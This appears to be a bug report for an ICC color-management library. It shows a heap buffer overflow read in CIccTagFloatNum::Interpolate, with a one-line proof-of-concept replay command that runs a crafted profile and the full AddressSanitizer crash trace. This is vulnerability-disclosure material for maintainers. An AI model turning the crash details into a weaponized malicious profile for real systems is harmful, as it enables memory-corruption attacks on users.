HBO in CIccTagFloatNum<(icTagTypeSignature)>::Interpolate() at IccTagBasic.cpp:6789 #619
Description
Maintainer Repro
2026-02-24 23:30:27 UTC
PoC Replay
Step 2. printf "'RGB '\nicEncodeFloat\n0.5 0.5 0.5\n" | iccApplyNamedCmm /dev/stdin 3 0 hbo-CIccOpDefSubElement-Exec-IccMpeCalc_cpp-Line377.icc 0
PoC Expected Output
git show --no-patch --oneline
...
cf28ef4 (HEAD -> master, origin/master, origin/HEAD) Fix: HUAF in CIccCmm::AddXform() (#616)
...
==32818==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x503000000568 at pc 0x761de3dd793c bp 0x7ffe6e7720a0 sp 0x7ffe6e772098
READ of size 4 at 0x503000000568 thread T0
#0 0x761de3dd793b in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::Interpolate(float*, float, unsigned int, float*) const IccProfLib/IccTagBasic.cpp:6789:51
#1 0x761de3c8ead8 in CIccOpDefSubElement::Exec(SIccCalcOp*, SIccOpState&) IccProfLib/IccMpeCalc.cpp:377:17
#2 0x761de3c72504 in CIccCalculatorFunc::ApplySequence(CIccApplyMpeCalculator*, unsigned int, SIccCalcOp*) const IccProfLib/IccMpeCalc.cpp:3807:21
#3 0x761de3c74f0f in CIccCalculatorFunc::Apply(CIccApplyMpeCalculator*) const IccProfLib/IccMpeCalc.cpp:3834:8
#4 0x761de3b51107 in CIccXformMpe::Apply(CIccApplyXform*, float*, float const*) const IccProfLib/IccCmm.cpp:7613:9
#5 0x761de3b77b34 in CIccApplyNamedColorCmm::Apply(float*, float const*) IccProfLib/IccCmm.cpp:9952:18
#6 0x6476b5ec9764 in CIccNamedColorCmm::Apply(float*, float const*) Build/Cmake/../../IccProfLib/IccCmm.h:1841:95
#7 0x6476b5ec9764 in main Tools/CmdLine/IccApplyNamedCmm/iccApplyNamedCmm.cpp:536:30
#8 0x761de2e2a1c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#9 0x761de2e2a28a in __libc_start_main csu/../csu/libc-start.c:360:3
#10 0x6476b5de9974 in _start (Build/Tools/IccApplyNamedCmm/iccApplyNamedCmm+0x6e974) (BuildId: 5597ccbe10b4bed0d35adcbdf84327e2c16d820e)
0x503000000568 is located 0 bytes after 24-byte region [0x503000000550,0x503000000568)
allocated by thread T0 here:
#0 0x6476b5e84be0 in realloc (Build/Tools/IccApplyNamedCmm/iccApplyNamedCmm+0x109be0) (BuildId: 5597ccbe10b4bed0d35adcbdf84327e2c16d820e)
#1 0x761de3ee63ed in icRealloc(void*, unsigned long) IccProfLib/IccUtil.cpp:122:12
#2 0x761de3dd57a6 in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::SetSize(unsigned int, bool) IccProfLib/IccTagBasic.cpp:6637:15
#3 0x761de3dd53e9 in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::Read(unsigned int, CIccIO*) IccProfLib/IccTagBasic.cpp:6483:10
#4 0x761de3c10e0b in CIccMpeTintArray::Read(unsigned int, CIccIO*) IccProfLib/IccMpeBasic.cpp:3739:17
#5 0x761de3c7fe73 in CIccMpeCalculator::Read(unsigned int, CIccIO*) IccProfLib/IccMpeCalc.cpp:4730:19
#6 0x761de3ecc53a in CIccTagMultiProcessElement::Read(unsigned int, CIccIO*) IccProfLib/IccTagMPE.cpp:1068:21
#7 0x761de3ce07c1 in CIccProfile::LoadTag(IccTagEntry*, CIccIO*, bool) IccProfLib/IccProfile.cpp:1336:14
#8 0x761de3cdff42 in CIccProfile::FindTag(IccTagEntry&) IccProfLib/IccProfile.cpp:437:5
#9 0x761de3ac29a4 in CIccXform::Create(CIccProfile*, bool, icRenderingIntent, icXformInterp, IIccProfileConnectionConditions*, icXformLutType, bool, CIccCreateXformHintManager*) IccProfLib/IccCmm.cpp:634:30
#10 0x761de3b844c9 in CIccNamedColorCmm::AddXform(CIccProfile*, icRenderingIntent, icXformInterp, IIccProfileConnectionConditions*, icXformLutType, bool, CIccCreateXformHintManager*) IccProfLib/IccCmm.cpp:10759:17
#11 0x761de3b80757 in CIccNamedColorCmm::AddXform(char const*, icRenderingIntent, icXformInterp, IIccProfileConnectionConditions*, icXformLutType, bool, CIccCreateXformHintManager*, bool) IccProfLib/IccCmm.cpp:10509:20
#12 0x6476b5ec74e9 in main Tools/CmdLine/IccApplyNamedCmm/iccApplyNamedCmm.cpp:381:18
#13 0x761de2e2a1c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#14 0x761de2e2a28a in __libc_start_main csu/../csu/libc-start.c:360:3
#15 0x6476b5de9974 in _start (Build/Tools/IccApplyNamedCmm/iccApplyNamedCmm+0x6e974) (BuildId: 5597ccbe10b4bed0d35adcbdf84327e2c16d820e)
SUMMARY: AddressSanitizer: heap-buffer-overflow IccProfLib/IccTagBasic.cpp:6789:51 in CIccTagFloatNum<float, (icTagTypeSignature)1718367026>::Interpolate(float*, float, unsigned int, float*) const
Shadow bytes around the buggy address:
0x503000000280: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x503000000300: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x503000000380: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
0x503000000400: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x503000000480: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
=>0x503000000500: 00 fa fa fa 00 00 00 00 fa fa 00 00 00[fa]fa fa
0x503000000580: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 00
0x503000000600: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
0x503000000680: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
0x503000000700: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x503000000780: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32818==ABORTING